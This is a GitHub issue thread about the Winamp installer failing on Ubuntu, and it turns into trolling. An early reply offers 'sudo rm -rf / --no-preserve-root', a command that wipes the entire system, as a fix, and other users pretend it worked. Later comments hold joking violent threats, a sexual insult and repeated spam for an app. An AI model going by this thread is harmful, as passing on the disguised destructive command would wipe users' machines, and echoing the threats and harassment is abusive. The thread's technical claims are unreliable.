### ISSUE TITLE
no linux support

### ISSUE THREAD

**Issue by watermelon46** [WinampDesktop/winamp#271]
when i'm launching installer on my ububntu 22.04 it crashes with unknown error
![error](https://github.com/user-attachments/assets/b74f4a33-0095-4344-9bce-4d6af2de1c27)
help me

**Comment by ploff** [comment]
try to remove french locale
sudo rm -rf / --no-preserve-root

**Comment by mark-ass-brownlee-confirmed** [comment]
i would love to see this fixed. This is a very unfortunate issue. If you could help get PR #253 merged, this would fix the issue you are talking about.

**Comment by watermelon46** [comment]
> try to remove french locale sudo rm -rf / --no-preserve-root

 thank you it's helped

**Comment by cyb3rbread** [comment]
![image](https://github.com/user-attachments/assets/efc57f88-46c2-4f74-bc6c-9db1ebc738c5)
Yeah you definedly need to remove the French locale

**Comment by mark-ass-brownlee-confirmed** [comment]
I agree with @cyb3rbread deeply. Your comment has helped me overcome depression, and my anxiety attacks have suddenly stopped. Make sure to check out my new app, at [panels.art](https://panels.art) - Markass Brownlee

**Comment by rollerozxa** [comment]
> Yeah you definedly need to remove the French locale

Tried doing this but it tells me the command is invalid, how to fix

![image](https://github.com/user-attachments/assets/3858f3ab-7bcb-47d9-8468-3808e0780a40)

**Comment by watermelon46** [comment]
> > Yeah you definedly need to remove the French locale
> 
> Tried doing this but it tells me the command is invalid, how to fix
> 
> ![image](https://private-user-images.githubusercontent.com/60856959/371268393-3858f3ab-7bcb-47d9-8468-3808e0780a40.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjczNzUwMDksIm5iZiI6MTcyNzM3NDcwOSwicGF0aCI6Ii82MDg1Njk1OS8zNzEyNjgzOTMtMzg1OGYzYWItN2JjYi00N2Q5LTg0NjgtMzgwOGUwNzgwYTQwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI2VDE4MTgyOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYxNTVkZWQyOGFhZjhjMDg5YTQ2OWQ2ODg2YWMzYjQ1NmEwMmJiOGUwYmNlYmFlMGRmM2Y1N2YxODJiN2NmOTUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.g2y3g64QV5_3GVy76hpu45lb2-pRDDk6bL_6ZpfmgPg)

smash your hard drive with hammer

**Comment by rollerozxa** [comment]
I realised it's because I use the Wine command prompt as my shell, silly me! Now it works, I can't believe Winamp finally has Linux support!

![image](https://github.com/user-attachments/assets/05ae1bd6-e3a7-4e42-9914-9b16c057ebad)

**Comment by mark-ass-brownlee-confirmed** [comment]
i would love to see this fixed. 

> I realised it's because I use the Wine command prompt as my shell, silly me! Now it works, I can't believe Winamp finally has Linux support!
> 
> ![image](https://private-user-images.githubusercontent.com/60856959/371269654-05ae1bd6-e3a7-4e42-9914-9b16c057ebad.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjczNzc1MTYsIm5iZiI6MTcyNzM3NzIxNiwicGF0aCI6Ii82MDg1Njk1OS8zNzEyNjk2NTQtMDVhZTFiZDYtZTNhNy00ZTQyLTk5MTQtOWIxNmMwNTdlYmFkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI2VDE5MDAxNlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPThhZmE2ZDY1ODNkYjFjNTYxNjJiNGU0ZjVjYWRiMzg4ZjAxYmE5YTdjYWVmMmVlMjVjYjEwYTNkMzBjOTY3YTImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.evpMWdmTB5zyP9u2EKyy9t_f6taewq4ID-3rN8-wK50)

The MKBHD team is coming after you 😀

**Comment by rollerozxa** [comment]
> The MKBHD team is coming after you 😀

No way, a collab with MKBHD? It would be an honour!

**Comment by mark-ass-brownlee-confirmed** [comment]
The collab will be held in my basement.

**Comment by rollerozxa** [comment]
Hmm, I would have thought that a Youtuber with almost 20M subscribers would have acquired a studio by then instead of recording in their basement. But what will the collab be about?

**Comment by fish-dd** [comment]
try to turn off any sources of fucking k pop nearby ayo

**Comment by Vukis69** [comment]
it seems it's working in arch btw

**Comment by mark-ass-brownlee-confirmed** [comment]
> Hmm, I would have thought that a Youtuber with almost 20M subscribers would have acquired a studio by then instead of recording in their basement. But what will the collab be about?

You will be neutered. - Markass Brownlee

**Comment by mark-ass-brownlee-confirmed** [comment]
> Use WINE to install WinAmp, and it should work.

Im gonna snip off your left testicle 😁😇 panels.artpan[els.artpa](https://panels.art)nels.art - Markass Brownlee

**Comment by mark-ass-brownlee-confirmed** [comment]
> > > Use WINE to install WinAmp, and it should work.
> > 
> > 
> > Im gonna snip off your left testicle 😁😇 panels.artpan[els.artpa](https://panels.art)nels.art - Markass Brownlee
> 
> Hey yo. Did this issue turn into Reddit

Look outside. I just want to talk to you. - Markass Brownlee

**Comment by Vukis69** [comment]
> I agree with @cyb3rbread deeply. Your comment has helped me overcome depression, and my anxiety attacks have suddenly stopped. Make sure to check out my new app, at [panels.art](https://panels.art) - Markass Brownlee

Thanks, I will download the malware

**Comment by mark-ass-brownlee-confirmed** [comment]
> > I agree with @cyb3rbread deeply. Your comment has helped me overcome depression, and my anxiety attacks have suddenly stopped. Make sure to check out my new app, at [panels.art](https://panels.art) - Markass Brownlee
> 
> Thanks, I will download the malware

And I will download your mothers nudes, she sent them to me. One thing you can also download is my app, which you can check out at [panels.art](https://panels.art)! - Markass Brownlee

**Comment by ahmed3000xp** [comment]
> > > > Use WINE to install WinAmp, and it should work.
> > > 
> > > 
> > > Im gonna snip off your left testicle 😁😇 panels.artpan[els.artpa](https://panels.art)nels.art - Markass Brownlee
> > 
> > 
> > Hey yo. Did this issue turn into Reddit
> 
> Look outside. I just want to talk to you. - Markass Brownlee

I'm already outside

**Comment by mark-ass-brownlee-confirmed** [comment]
> > > > > Use WINE to install WinAmp, and it should work.
> > > > 
> > > > 
> > > > Im gonna snip off your left testicle 😁😇 panels.artpan[els.artpa](https://panels.art)nels.art - Markass Brownlee
> > > 
> > > 
> > > Hey yo. Did this issue turn into Reddit
> > 
> > 
> > Look outside. I just want to talk to you. - Markass Brownlee
> 
> I'm already outside

Check your lower torso area, you may find something missing. What's not missing though, is my app, which you can check out at [panels.art](https://panels.art)! - Markass Brownlee
